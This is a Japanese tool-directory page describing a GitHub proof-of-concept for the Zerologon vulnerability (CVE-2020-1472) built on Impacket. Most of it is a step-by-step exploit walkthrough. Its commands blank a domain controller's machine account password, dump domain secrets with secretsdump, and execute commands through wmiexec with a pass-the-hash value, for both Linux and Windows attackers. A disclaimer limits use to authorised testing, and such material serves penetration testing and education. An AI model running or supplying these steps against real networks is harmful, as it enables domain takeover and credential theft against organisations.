Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/tuancui22/zerologonwithimpacket-cve2020-1472
特権昇格パスワード攻撃脆弱性分析エクスプロイト横移動ポストエクスプロイトペネトレーションテスト学習と教育

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
tuancui22/zerologonwithimpacket-cve2020-1472

ZerologonWithImpacket-CVE2020-1472

CVE-2020-1472 (Zerologon) の実用的な概念実証 (PoC)。Impacket ライブラリを使用して Netlogon の脆弱性を悪用し、ドメインコントローラへの不正アクセスを実行します。

リポジトリを見る
11年前未レビュー

Zerologon と Impacket の組み合わせエクスプロイト(CVE-2020-1472)

このリポジトリには、CVE-2020-1472(Zerologon)を悪用するために Impacket ツールと組み合わせた Zerologon エクスプロイトの更新版実装(2024年)が含まれています。このエクスプロイトは Windows Server 環境を標的とし、マシンアカウントのパスワードを操作して横移動(ラテラルムーブメント)を行います。

特徴

  • CVE-2020-1472(Zerologon)を悪用して、ターゲットのマシンアカウントパスワードを空文字列に設定します。
  • Impacket ツールを利用して、被害マシン上の資格情報をダンプし、コマンドを実行します。

要件

  1. Python 3.x
  2. 以下のコマンドで必要な依存関係をインストールします:
    root@kitploit:~
    pip install -r requirements.txt
    

使用方法

シナリオ例

  • 被害者: Windows Server 2016
  • 攻撃者: Kali Linux(または Windows システム)

エクスプロイトコマンド(Kali Linux)

  1. マシンアカウントのパスワードを空文字列に設定します:
    root@kitploit:~
    python3 set_empty_pw.py WIN-C9PAHHGJN91 192.168.40.145
    
  2. ドメインコントローラーからシークレットをダンプします:
    root@kitploit:~
    python3 secretsdump.py -just-dc tancongmang/WIN-C9PAHHGJN91\[email protected]
    
  3. 被害マシン上でコマンドを実行します:
    root@kitploit:~
    python3 wmiexec.py tancongmang/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
    

エクスプロイトコマンド(Windows 攻撃者)

  1. マシンアカウントのパスワードを空文字列に設定します:
    root@kitploit:~
    python set_empty_pw.py WIN-C9PAHHGJN91 192.168.40.145
    
  2. ドメインコントローラーからシークレットをダンプします:
    root@kitploit:~
    python secretsdump.py -just-dc "tancongmang/[email protected]"
    
  3. 被害マシン上でコマンドを実行します:
    root@kitploit:~
    python wmiexec.py tancongmang/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
    

注意事項

  • WIN-C9PAHHGJN91 と 192.168.40.145 は、ターゲットの実際のホスト名と IP アドレスに置き換えてください。
  • このツールを使用する前に、適切な権限が付与されていることを確認してください。
  • このツールは教育およびペネトレーションテストの目的にのみ使用してください。

免責事項

このツールは責任を持って使用してください。明示的な許可なくシステムを悪用するための不正使用は違法かつ非倫理的です。著者は、このツールによって引き起こされた誤用や損害について一切の責任を負いません。

ツールをダウンロード